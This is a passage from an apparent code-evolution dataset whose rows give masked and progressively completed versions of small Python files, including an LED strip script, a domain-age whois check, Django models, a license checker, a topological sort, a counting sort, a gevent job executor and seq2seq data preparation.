LED_PIN = 18 # GPIO pin connected to the pixels (must support PWM!).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 5 # DMA channel to use for generating signal (try 5)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0
LED_STRIP = ws.WS2811_STRIP_GRB
#LED_STRIP = ws.SK6812W_STRIP
lightUp = math.floor(percent/count)
# Initialize the library (must be called once before other functions).
def setPixel(strip):
for i in range(count):
if(i<lightUp):
strip.setPixelColor(i, Color(0, 255, 0))
strip.show()
else:
strip.setPixelColor(i, Color(255, 0, 0))
strip.show()
if __name__ == '__main__':
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL, LED_STRIP)
strip.begin()
setPixel(strip)
| [
0,
2,
3,
4,
5
] |
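The green/red split above hinges on lightUp; a hardware-free sketch of that arithmetic as a pure function. It keeps the script's floor(percent / count) formula as-is; the commented alternative is only an assumption about what a percentage-of-strip version would look like:

import math

def pixels_to_light(count, percent):
    # Same arithmetic as the script above.
    return math.floor(percent / count)

assert pixels_to_light(30, 90) == 3   # 3 pixels green, the rest red
# If percent were instead meant as a fraction of the strip,
# count * percent // 100 would light 27 of 30 pixels at 90%.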
685 | 07d574060ded0d98734b4f184dcba7377b3a5480 | <mask token>
| <mask token>
def age_domain(url):
try:
w = whois.whois(url)
if w:
for l in w.expiration_date:
d1 = datetime.date(l)
print(d1)
for l1 in w.creation_date:
d2 = datetime.date(l1)
print(d2)
diff = (d1 - d2).days
print(diff)
if diff / 30 < 6:
return 1
else:
return 0
except:
return -1
| from datetime import datetime
import whois
def age_domain(url):
try:
w = whois.whois(url)
if w:
for l in w.expiration_date:
d1 = datetime.date(l)
print(d1)
for l1 in w.creation_date:
d2 = datetime.date(l1)
print(d2)
diff = (d1 - d2).days
print(diff)
if diff / 30 < 6:
return 1
else:
return 0
except:
return -1
| from datetime import datetime
import whois
def age_domain(url):
try:
w = whois.whois(url)
if(w):
for l in w.expiration_date:
d1 = datetime.date(l)
print(d1)
for l1 in w.creation_date:
d2 = datetime.date(l1)
print(d2)
diff = (d1 - d2).days
print(diff)
if ((diff / 30) < 6):
return 1
else:
return 0
except:
return -1
| null | [
0,
1,
2,
3
] |
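The six-month test above reduces to a date difference; a network-free sketch with invented creation/expiration dates standing in for the whois lookup:

from datetime import date

creation = date(2023, 1, 15)    # invented values
expiration = date(2023, 5, 20)
diff = (expiration - creation).days
# Same threshold as age_domain: under six 30-day months flags the domain.
print(1 if diff / 30 < 6 else 0)   # -> 1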
686 | a4db12fee72989f983c1069839dc0a5ede4561a3 | <mask token>
class PraiseHistory(TimeStampedModel):
class Meta:
verbose_name = '칭찬 내역'
verbose_name_plural = verbose_name
praise = models.ForeignKey(Praise, verbose_name='칭찬')
choices = JSONField(verbose_name='칭찬 대상 목록')
sender_key = models.CharField(verbose_name='보낸 사람 user key', max_length=200
)
receiver_key = models.CharField(verbose_name='받은 사람 user key',
max_length=200)
| <mask token>
class Praise(TimeStampedModel):
class Meta:
verbose_name = '칭찬'
verbose_name_plural = verbose_name
<mask token>
class PraiseHistory(TimeStampedModel):
class Meta:
verbose_name = '칭찬 내역'
verbose_name_plural = verbose_name
praise = models.ForeignKey(Praise, verbose_name='칭찬')
choices = JSONField(verbose_name='칭찬 대상 목록')
sender_key = models.CharField(verbose_name='보낸 사람 user key', max_length=200
)
receiver_key = models.CharField(verbose_name='받은 사람 user key',
max_length=200)
| <mask token>
class Praise(TimeStampedModel):
class Meta:
verbose_name = '칭찬'
verbose_name_plural = verbose_name
content = models.CharField(verbose_name='내용', unique=True, max_length=200)
class PraiseHistory(TimeStampedModel):
class Meta:
verbose_name = '칭찬 내역'
verbose_name_plural = verbose_name
praise = models.ForeignKey(Praise, verbose_name='칭찬')
choices = JSONField(verbose_name='칭찬 대상 목록')
sender_key = models.CharField(verbose_name='보낸 사람 user key', max_length=200
)
receiver_key = models.CharField(verbose_name='받은 사람 user key',
max_length=200)
| from django.contrib.postgres.fields import JSONField
from django.db import models
from service.models import TimeStampedModel
class Praise(TimeStampedModel):
class Meta:
verbose_name = '칭찬'
verbose_name_plural = verbose_name
content = models.CharField(verbose_name='내용', unique=True, max_length=200)
class PraiseHistory(TimeStampedModel):
class Meta:
verbose_name = '칭찬 내역'
verbose_name_plural = verbose_name
praise = models.ForeignKey(Praise, verbose_name='칭찬')
choices = JSONField(verbose_name='칭찬 대상 목록')
sender_key = models.CharField(verbose_name='보낸 사람 user key', max_length=200
)
receiver_key = models.CharField(verbose_name='받은 사람 user key',
max_length=200)
| null | [
2,
3,
4,
5
] |
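A sketch of recording one praise with these models; the app label in the import is hypothetical, migrations are assumed applied, and on Django 2+ the ForeignKey would additionally need an on_delete argument:

from praises.models import Praise, PraiseHistory  # hypothetical app label

praise, _ = Praise.objects.get_or_create(content='Great teamwork')
PraiseHistory.objects.create(
    praise=praise,
    choices=[{'user_key': 'u-001'}, {'user_key': 'u-002'}],  # invented keys
    sender_key='u-100',
    receiver_key='u-001',
)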
687 | c70aa1a373530ac73553753e62d3989f5bc79287 | <mask token>
class LicenseChecker(object):
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class LicenseChecker(object):
<mask token>
<mask token>
def __updateTimes(self, times):
actual = self.__countTimes()
ff = open('times.ehead', 'w')
ff.write(str(actual - times))
ff.close()
def isActive(self):
try:
site = urllib.urlopen(self.url)
content = site.readlines()
site.close()
except IOError:
if not self.__countTimes() == 0:
self.__updateTimes(1)
return {'active': True, 'msg': 'Ejecutando sin conexion.'}
else:
return {'active': False, 'msg':
'Ejecutado demasiadas veces sin conexion.'}
if content[0].strip() == 'ACTIVE':
self.__updateTimes(self.count_offline)
return {'active': True, 'msg': 'Iniciando Sistema'}
else:
return {'active': False, 'msg': content[0].strip()}
| <mask token>
class LicenseChecker(object):
def __init__(self):
self.url = 'http://logon.guidoaccardo.com.ar/'
self.count_offline = 15
def __countTimes(self):
ff = open('times.ehead', 'r')
bb = ff.read()
ff.close()
return int(bb)
def __updateTimes(self, times):
actual = self.__countTimes()
ff = open('times.ehead', 'w')
ff.write(str(actual - times))
ff.close()
def isActive(self):
try:
site = urllib.urlopen(self.url)
content = site.readlines()
site.close()
except IOError:
if not self.__countTimes() == 0:
self.__updateTimes(1)
return {'active': True, 'msg': 'Ejecutando sin conexion.'}
else:
return {'active': False, 'msg':
'Ejecutado demasiadas veces sin conexion.'}
if content[0].strip() == 'ACTIVE':
self.__updateTimes(self.count_offline)
return {'active': True, 'msg': 'Iniciando Sistema'}
else:
return {'active': False, 'msg': content[0].strip()}
| import urllib
class LicenseChecker(object):
def __init__(self):
self.url = 'http://logon.guidoaccardo.com.ar/'
self.count_offline = 15
def __countTimes(self):
ff = open('times.ehead', 'r')
bb = ff.read()
ff.close()
return int(bb)
def __updateTimes(self, times):
actual = self.__countTimes()
ff = open('times.ehead', 'w')
ff.write(str(actual - times))
ff.close()
def isActive(self):
try:
site = urllib.urlopen(self.url)
content = site.readlines()
site.close()
except IOError:
if not self.__countTimes() == 0:
self.__updateTimes(1)
return {'active': True, 'msg': 'Ejecutando sin conexion.'}
else:
return {'active': False, 'msg':
'Ejecutado demasiadas veces sin conexion.'}
if content[0].strip() == 'ACTIVE':
self.__updateTimes(self.count_offline)
return {'active': True, 'msg': 'Iniciando Sistema'}
else:
return {'active': False, 'msg': content[0].strip()}
| #!/usr/bin/env python
import urllib
class LicenseChecker( object ):
def __init__( self ):
self.url = 'http://logon.guidoaccardo.com.ar/'
self.count_offline = 15
def __countTimes( self ):
ff = open( 'times.ehead', 'r' )
bb = ff.read()
ff.close()
return int( bb )
def __updateTimes( self, times ):
actual = self.__countTimes()
ff = open( 'times.ehead', 'w' )
ff.write( str( actual-times ) )
ff.close()
def isActive( self ):
try:
site = urllib.urlopen( self.url )
content = site.readlines()
site.close()
except IOError:
if not self.__countTimes() == 0:
self.__updateTimes( 1 )
return { 'active':True, 'msg':'Ejecutando sin conexion.' }
else:
return { 'active':False, 'msg':'Ejecutado demasiadas veces sin conexion.' }
if content[0].strip() == 'ACTIVE':
self.__updateTimes( self.count_offline )
return { 'active':True, 'msg':'Iniciando Sistema' }
else:
return { 'active':False, 'msg':content[0].strip() }
| [
1,
3,
5,
6,
7
] |
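The offline grace period above is a counter persisted to times.ehead; a file-free sketch of the same decision rule, with the counter passed in explicitly:

def offline_decision(times_left):
    # Mirrors isActive()'s IOError branch, minus the file I/O.
    if times_left != 0:
        return {'active': True, 'msg': 'Ejecutando sin conexion.'}, times_left - 1
    return {'active': False, 'msg': 'Ejecutado demasiadas veces sin conexion.'}, 0

result, left = offline_decision(2)   # first offline run: still active
result, left = offline_decision(left)
result, left = offline_decision(left)
print(result['active'])              # False once the allowance is spent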
688 | 8680c033662a89ed6fc73e65ec544b93558c4208 | <mask token>
| <mask token>
def main(args=None):
if args:
slide_show(args[0])
| from .feature import slide_show
def main(args=None):
if args:
slide_show(args[0])
| null | null | [
0,
1,
2
] |
689 | 56892e125934d5de937b92a08bd7707c12c70928 | <mask token>
| def findOrder(numCourses, prerequisites):
if len(prerequisites) == 0:
order = []
for i in range(0, numCourses):
order.append(i)
return order
edges = {}
for prerequisite in prerequisites:
if prerequisite[0] == prerequisite[1]:
return []
if prerequisite[0] not in edges:
edges[prerequisite[0]] = [prerequisite[1]]
else:
v = edges[prerequisite[0]]
v.append(prerequisite[1])
edges[prerequisite[0]] = v
visited = {}
stack = []
order = []
for vertex in edges.keys():
if vertex not in visited:
stack.append(vertex)
visited[vertex] = 1
while len(stack) != 0:
v = stack.pop()
if v not in edges:
order.append(v)
else:
flag = True
stack.append(v)
for u in edges[v]:
if u in visited:
if u in edges and v in edges[u]:
return []
else:
visited[u] = 1
stack.append(u)
flag = False
if flag:
stack.pop()
order.append(v)
for v in range(0, numCourses):
if v not in order:
order.append(v)
return order[::-1]
<mask token>
| def findOrder(numCourses, prerequisites):
if len(prerequisites) == 0:
order = []
for i in range(0, numCourses):
order.append(i)
return order
edges = {}
for prerequisite in prerequisites:
if prerequisite[0] == prerequisite[1]:
return []
if prerequisite[0] not in edges:
edges[prerequisite[0]] = [prerequisite[1]]
else:
v = edges[prerequisite[0]]
v.append(prerequisite[1])
edges[prerequisite[0]] = v
visited = {}
stack = []
order = []
for vertex in edges.keys():
if vertex not in visited:
stack.append(vertex)
visited[vertex] = 1
while len(stack) != 0:
v = stack.pop()
if v not in edges:
order.append(v)
else:
flag = True
stack.append(v)
for u in edges[v]:
if u in visited:
if u in edges and v in edges[u]:
return []
else:
visited[u] = 1
stack.append(u)
flag = False
if flag:
stack.pop()
order.append(v)
for v in range(0, numCourses):
if v not in order:
order.append(v)
return order[::-1]
print(findOrder(2, [[1, 0]]))
| # 4, [[1,0],[2,0],[3,1],[3,2]]
# 3->1->0
# \ ^
# \ |
# \> 2
# 1,0,2,3
# stack 3
#
# 0 1 2 3
# 1,0
# stack 1
# 0
#
# def findOrder(numCourses, prerequisites):
# if len(prerequisites) == 0:
# order = []
# for i in range(0, numCourses):
# order.append(i)
# return order
#
# edges = {}
# for prerequisite in prerequisites:
# if prerequisite[0] not in edges:
# edges[prerequisite[0]] = [prerequisite[1]]
# else:
# v = edges[prerequisite[0]]
# v.append(prerequisite[1])
# edges[prerequisite[0]] = v
#
# visited = {}
# stack = []
# order = []
# while len(edges) != 0:
# edge_u = list(edges.keys())[0]
# if len(stack) == 0:
# if edge_u not in visited:
# stack.append(edge_u)
# visited[edge_u] = 1
# else:
# u = stack[-1]
# flag = True
# if u in edges:
# for v in edges[u]:
# if v not in visited:
# visited[v] = 1
# stack.append(v)
# flag = False
# else:
# if v in edges and u in edges[v]:
# return []
# if flag:
# order.append(u)
# stack.pop()
# if u in edges:
# del edges[u]
#
# for i in range(0, numCourses):
# if i not in order:
# order.append(i)
# return order
def findOrder(numCourses, prerequisites):
if len(prerequisites) == 0:
order = []
for i in range(0, numCourses):
order.append(i)
return order
edges = {}
for prerequisite in prerequisites:
if prerequisite[0] == prerequisite[1]:
return []
if prerequisite[0] not in edges:
edges[prerequisite[0]] = [prerequisite[1]]
else:
v = edges[prerequisite[0]]
v.append(prerequisite[1])
edges[prerequisite[0]] = v
visited = {}
stack = []
order = []
for vertex in edges.keys():
if vertex not in visited:
stack.append(vertex)
visited[vertex] = 1
while len(stack) != 0:
v = stack.pop()
if v not in edges:
order.append(v)
else:
flag = True
stack.append(v)
for u in edges[v]:
if u in visited:
if u in edges and v in edges[u]:
return []
else:
visited[u] = 1
stack.append(u)
flag = False
if flag:
stack.pop()
order.append(v)
for v in range(0, numCourses):
if v not in order:
order.append(v)
return order[::-1]
print(findOrder(2, [[1, 0]]))
# print(findOrder(4, [[1, 0], [2, 0], [3, 1], [3, 2]]))
| null | [
0,
1,
2,
3
] |
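The snippet solves course ordering with an iterative DFS; for comparison, a sketch of the same problem via Kahn's algorithm on indegrees (a different technique, not the author's):

from collections import deque

def find_order_kahn(num_courses, prerequisites):
    indegree = [0] * num_courses
    adj = [[] for _ in range(num_courses)]
    for course, prereq in prerequisites:
        adj[prereq].append(course)   # prereq must come before course
        indegree[course] += 1
    queue = deque(i for i in range(num_courses) if indegree[i] == 0)
    order = []
    while queue:
        node = queue.popleft()
        order.append(node)
        for nxt in adj[node]:
            indegree[nxt] -= 1
            if indegree[nxt] == 0:
                queue.append(nxt)
    return order if len(order) == num_courses else []   # [] on a cycle

assert find_order_kahn(2, [[1, 0]]) == [0, 1]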
690 | efca954e1977a6f6ac9a966b3c84ba80f5b7a663 | <mask token>
| <mask token>
for n in range(N):
counting_list[int(sys.stdin.readline())] += 1
for i, v in enumerate(counting_list):
if v:
sys.stdout.write((str(i) + '\n') * v)
| <mask token>
sys.stdin = open('10989.txt', 'r')
counting_list = [(0) for _ in range(10001)]
N = int(sys.stdin.readline())
for n in range(N):
counting_list[int(sys.stdin.readline())] += 1
for i, v in enumerate(counting_list):
if v:
sys.stdout.write((str(i) + '\n') * v)
| import sys
sys.stdin = open('10989.txt', 'r')
counting_list = [(0) for _ in range(10001)]
N = int(sys.stdin.readline())
for n in range(N):
counting_list[int(sys.stdin.readline())] += 1
for i, v in enumerate(counting_list):
if v:
sys.stdout.write((str(i) + '\n') * v)
| import sys
sys.stdin = open('10989.txt', 'r')
counting_list = [0 for _ in range(10001)]
N = int(sys.stdin.readline())
for n in range(N):
counting_list[int(sys.stdin.readline())] += 1
for i, v in enumerate(counting_list):
if v:
sys.stdout.write((str(i) + '\n') * v)
| [
0,
1,
2,
3,
4
] |
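The same counting-sort idea without the stdin redirection, as a testable function; the 1..10000 value range is assumed from the original problem the 10989.txt input refers to:

def counting_sort(nums, max_value=10000):
    counts = [0] * (max_value + 1)
    for n in nums:
        counts[n] += 1
    out = []
    for value, c in enumerate(counts):
        out.extend([value] * c)
    return out

assert counting_sort([5, 2, 3, 1, 4, 2, 3]) == [1, 2, 2, 3, 3, 4, 5]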
691 | 0709d413ddbe41a0c97f94b7819fdfded241d3fc | <mask token>
class Resources:
<mask token>
def __init__(self, title, author, publisher, year):
self.title = title
self.author = author
self.publisher = publisher
self.year = year
<mask token>
<mask token>
def set_publisher(self, publisher):
"""Method that sets the publisher of a resource object"""
self.publisher = publisher
<mask token>
<mask token>
<mask token>
def get_publisher(self):
"""Method that gets the publisher of a resource object"""
return self.publisher
<mask token>
<mask token>
| <mask token>
class Resources:
<mask token>
def __init__(self, title, author, publisher, year):
self.title = title
self.author = author
self.publisher = publisher
self.year = year
def set_title(self, title):
"""Method that sets the title of a resource object"""
self.title = title
def set_author(self, author):
"""Method that sets the author of a resource object"""
self.author = author
def set_publisher(self, publisher):
"""Method that sets the publisher of a resource object"""
self.publisher = publisher
def set_year(self, year):
"""Method that sets the year of a resource object"""
self.year = year
<mask token>
def get_author(self):
"""Method that gets the author of a resource object"""
return self.author
def get_publisher(self):
"""Method that gets the publisher of a resource object"""
return self.publisher
<mask token>
<mask token>
| <mask token>
class Resources:
<mask token>
def __init__(self, title, author, publisher, year):
self.title = title
self.author = author
self.publisher = publisher
self.year = year
def set_title(self, title):
"""Method that sets the title of a resource object"""
self.title = title
def set_author(self, author):
"""Method that sets the author of a resource object"""
self.author = author
def set_publisher(self, publisher):
"""Method that sets the publisher of a resource object"""
self.publisher = publisher
def set_year(self, year):
"""Method that sets the year of a resource object"""
self.year = year
<mask token>
def get_author(self):
"""Method that gets the author of a resource object"""
return self.author
def get_publisher(self):
"""Method that gets the publisher of a resource object"""
return self.publisher
<mask token>
def get_resource_details(self):
"""Method that returns the main details of a resource object"""
return (
f'[Title:"{self.get_title()}"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]'
)
| <mask token>
class Resources:
<mask token>
def __init__(self, title, author, publisher, year):
self.title = title
self.author = author
self.publisher = publisher
self.year = year
def set_title(self, title):
"""Method that sets the title of a resource object"""
self.title = title
def set_author(self, author):
"""Method that sets the author of a resource object"""
self.author = author
def set_publisher(self, publisher):
"""Method that sets the publisher of a resource object"""
self.publisher = publisher
def set_year(self, year):
"""Method that sets the year of a resource object"""
self.year = year
<mask token>
def get_author(self):
"""Method that gets the author of a resource object"""
return self.author
def get_publisher(self):
"""Method that gets the publisher of a resource object"""
return self.publisher
def get_year(self):
"""Method that gets the year of a resource object"""
return self.year
def get_resource_details(self):
"""Method that returns the main details of a resource object"""
return (
f'[Title:"{self.get_title()}"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]'
)
| # -*- coding: utf-8 -*-
"""
Created on Tue Oct 9 16:22:21 2018
@author: SDis
"""
#import Code.Members_module
class Resources:
    """ Parent class for Books and eResources containing the main data fields and related setters and getters"""
def __init__(self, title, author, publisher, year):
self.title = title
self.author = author
self.publisher = publisher
self.year = year
#Setters
def set_title (self, title):
"""Method that sets the title of a resource object"""
self.title = title
def set_author (self, author):
"""Method that sets the author of a resource object"""
self.author = author
def set_publisher (self, publisher):
"""Method that sets the publisher of a resource object"""
self.publisher = publisher
def set_year (self, year):
"""Method that sets the year of a resource object"""
self.year = year
#Getters
def get_title(self):
"""Method that gets the title of a resource object"""
return self.title
def get_author(self):
"""Method that gets the author of a resource object"""
return self.author
def get_publisher(self):
"""Method that gets the publisher of a resource object"""
return self.publisher
def get_year(self):
"""Method that gets the year of a resource object"""
return self.year
def get_resource_details (self):
"""Method that returns the main details of a resource object"""
return (f"[Title:\"{self.get_title()}\"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]")
| [
4,
8,
9,
10,
13
] |
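A usage sketch for the class above; the bibliographic details are invented:

book = Resources('Clean Code', 'Robert C. Martin', 'Prentice Hall', 2008)
book.set_year(2009)   # setters mutate the object in place
print(book.get_resource_details())
# [Title:"Clean Code"] [Author:Robert C. Martin] [Publisher:Prentice Hall] [Year:2009]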
692 | 9156ee034ceb8a39fc1eb3a18c1597c737814c72 | # from django.test import TestCase, LiveServerTestCase, Client
# from MeetUps.models import*
# from django.shortcuts import reverse
# from .forms import RegistrationForm
# class MeetUpViewTest(TestCase):
# @classmethod
# def setUpTestData(cls):
# #create or get all meetups
# def test_index(request,meetup_slug): | null | null | null | null | [
1
] |
693 | afcadc11d23fb921eb6f8038a908de02ee763ca4 | <mask token>
class GeventExecutor(BaseExecutor):
<mask token>
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
| <mask token>
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
| <mask token>
try:
import gevent
except ImportError:
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
| from __future__ import absolute_import
import sys
from apscheduler.executors.base import BaseExecutor, run_job
try:
import gevent
except ImportError:
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self.
_logger.name).link(callback)
| from __future__ import absolute_import
import sys
from apscheduler.executors.base import BaseExecutor, run_job
try:
import gevent
except ImportError: # pragma: nocover
raise ImportError('GeventExecutor requires gevent installed')
class GeventExecutor(BaseExecutor):
"""
Runs jobs as greenlets.
Plugin alias: ``gevent``
"""
def _do_submit_job(self, job, run_times):
def callback(greenlet):
try:
events = greenlet.get()
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
gevent.spawn(run_job, job, job._jobstore_alias, run_times, self._logger.name).\
link(callback)
| [
2,
3,
4,
5,
6
] |
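The executor rests on gevent's spawn-and-link pattern; a sketch of that pattern in isolation, with an invented job callable standing in for run_job:

import gevent

def fake_job():
    return 'events'

def callback(greenlet):
    try:
        print('job produced:', greenlet.get())
    except BaseException as exc:
        print('job failed:', exc)

g = gevent.spawn(fake_job)
g.link(callback)          # callback fires once the greenlet is dead
gevent.joinall([g])
gevent.sleep(0)           # give the link callback a turn on the hub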
694 | bf51da12632013c62aa543ae7f02415057138c7a | <mask token>
def get_qa_set(directory, jsonl_file):
    """Split a jsonl QA file into parallel .src/.targ files under directory, unless they're there."""
set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
set_path = os.path.join(directory, set_name)
src_path = set_path + '.src'
targ_path = set_path + '.targ'
if gfile.Exists(src_path) and gfile.Exists(targ_path):
return set_path
with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(
targ_path, 'w') as targfile:
for line in qafile:
lcontent = json.loads(line)
srcfile.write(lcontent['q'].replace('\n', '') + '\n')
targfile.write(lcontent['a'].replace('\n', '') + '\n')
return set_path
<mask token>
def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file
    ):
    """Get jsonl QA data into data_dir, create the vocabulary and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
train_data_file: jsonl data file.
dev_data_file: jsonl data file.
vocab_file: bpe json vocab
Returns:
    A tuple of 5 elements:
      (1) path to the token-ids for src training data-set,
      (2) path to the token-ids for target training data-set,
      (3) path to the token-ids for src development data-set,
      (4) path to the token-ids for target development data-set,
      (5) path to the vocabulary file.
"""
if not gfile.Exists(data_dir):
gfile.MkDir(data_dir)
train_path = get_qa_set(data_dir, train_data_file)
dev_path = get_qa_set(data_dir, dev_data_file)
vocab_path = os.path.join(data_dir, 'vocab.txt')
create_vocabulary(vocab_path, vocab_file)
src_train_ids_path = train_path + '.src.ids'
targ_train_ids_path = train_path + '.targ.ids'
data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)
data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)
src_dev_ids_path = dev_path + '.src.ids'
targ_dev_ids_path = dev_path + '.targ.ids'
data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)
data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)
return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,
targ_dev_ids_path, vocab_path)
| <mask token>
def get_qa_set(directory, jsonl_file):
    """Split a jsonl QA file into parallel .src/.targ files under directory, unless they're there."""
set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
set_path = os.path.join(directory, set_name)
src_path = set_path + '.src'
targ_path = set_path + '.targ'
if gfile.Exists(src_path) and gfile.Exists(targ_path):
return set_path
with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(
targ_path, 'w') as targfile:
for line in qafile:
lcontent = json.loads(line)
srcfile.write(lcontent['q'].replace('\n', '') + '\n')
targfile.write(lcontent['a'].replace('\n', '') + '\n')
return set_path
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(_WORD_SPLIT.split(space_separated_fragment))
return [w for w in words if w]
<mask token>
def prepare_jsonlbpe_data(data_dir, train_data_file, dev_data_file, vocab_file
    ):
    """Get jsonl QA data into data_dir, create the vocabulary and tokenize data.
Args:
data_dir: directory in which the data sets will be stored.
train_data_file: jsonl data file.
dev_data_file: jsonl data file.
vocab_file: bpe json vocab
Returns:
    A tuple of 5 elements:
      (1) path to the token-ids for src training data-set,
      (2) path to the token-ids for target training data-set,
      (3) path to the token-ids for src development data-set,
      (4) path to the token-ids for target development data-set,
      (5) path to the vocabulary file.
"""
if not gfile.Exists(data_dir):
gfile.MkDir(data_dir)
train_path = get_qa_set(data_dir, train_data_file)
dev_path = get_qa_set(data_dir, dev_data_file)
vocab_path = os.path.join(data_dir, 'vocab.txt')
create_vocabulary(vocab_path, vocab_file)
src_train_ids_path = train_path + '.src.ids'
targ_train_ids_path = train_path + '.targ.ids'
data_to_token_ids(train_path + '.src', src_train_ids_path, vocab_path)
data_to_token_ids(train_path + '.targ', targ_train_ids_path, vocab_path)
src_dev_ids_path = dev_path + '.src.ids'
targ_dev_ids_path = dev_path + '.targ.ids'
data_to_token_ids(dev_path + '.src', src_dev_ids_path, vocab_path)
data_to_token_ids(dev_path + '.targ', targ_dev_ids_path, vocab_path)
return (src_train_ids_path, targ_train_ids_path, src_dev_ids_path,
targ_dev_ids_path, vocab_path)
| <mask token>
def get_qa_set(directory, jsonl_file):
    """Split a jsonl QA file into parallel .src/.targ files under directory, unless they're there."""
set_name = os.path.splitext(os.path.basename(jsonl_file))[0]
set_path = os.path.join(directory, set_name)
src_path = set_path + '.src'
targ_path = set_path + '.targ'
if gfile.Exists(src_path) and gfile.Exists(targ_path):
return set_path
with open(jsonl_file, 'r') as qafile, open(src_path, 'w') as srcfile, open(
targ_path, 'w') as targfile:
for line in qafile:
lcontent = json.loads(line)
srcfile.write(lcontent['q'].replace('\n', '') + '\n')
targfile.write(lcontent['a'].replace('\n', '') + '\n')
return set_path
def basic_tokenizer(sentence):
"""Very basic tokenizer: split the sentence into a list of tokens."""
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(_WORD_SPLIT.split(space_separated_fragment))
return [w for w in words if w]
def create_vocabulary(vocabulary_path, json_vocab_path):
    """Create vocabulary file (if it does not exist yet) from a BPE json vocab.
    The json vocab's 'w2id' mapping is sorted by id, prefixed with the special
    tokens (_PAD, _GO, _EOS, _UNK), and written to vocabulary_path in a
    one-token-per-line format, so that the token in the first line gets id=0,
    the second line gets id=1, and so on.
Args:
vocabulary_path: path where the vocabulary will be created.
json_vocab_path: data file that will be used to create vocabulary.
"""
if not gfile.Exists(vocabulary_path):
print('Transform vocabulary to %s' % vocabulary_path)
with gfile.GFile(json_vocab_path, mode='rb') as f:
jvocab = json.load(f)
vocab = jvocab['w2id']
vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get)
with gfile.GFile(vocabulary_path, mode='wb') as vocab_file:
for w in vocab_list:
vocab_file.write(w + b'\n')
def initialize_vocabulary(vocabulary_path):
"""Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
also return the reversed-vocabulary ["dog", "cat"].
Args:
vocabulary_path: path to the file containing the vocabulary.
Returns:
a pair: the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
Raises:
ValueError: if the provided vocabulary_path does not exist.
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode='rb') as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.strip() for line in rev_vocab]
vocab = dict([(x, y) for y, x in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
raise ValueError('Vocabulary file %s not found.', vocabulary_path)
def sentence_to_token_ids(sentence, vocabulary):
"""Convert a string to list of integers representing token-ids.
For example, a sentence "I have a dog" may become tokenized into
["I", "have", "a", "dog"] and with vocabulary {"I": 1, "have": 2,
"a": 4, "dog": 7"} this function will return [1, 2, 4, 7].
Args:
sentence: the sentence in bytes format to convert to token-ids.
vocabulary: a dictionary mapping tokens to integers.
Returns:
a list of integers, the token-ids for the sentence.
"""
return [vocabulary.get(w, UNK_ID) for w in sentence.strip().split()]
def data_to_token_ids(data_path, target_path, vocabulary_path):
"""Tokenize data file and turn into token-ids using given vocabulary file.
This function loads data line-by-line from data_path, calls the above
sentence_to_token_ids, and saves the result to target_path. See comment
for sentence_to_token_ids on the details of token-ids format.
Args:
data_path: path to the data file in one-sentence-per-line format.
target_path: path where the file with token-ids will be created.
vocabulary_path: path to the vocabulary file.
"""
if not gfile.Exists(target_path):
print('Tokenizing data in %s' % data_path)
vocab, _ = initialize_vocabulary(vocabulary_path)
with gfile.GFile(data_path, mode='rb') as data_file:
with gfile.GFile(target_path, mode='w') as tokens_file:
counter = 0
for line in data_file:
counter += 1
if counter % 100000 == 0:
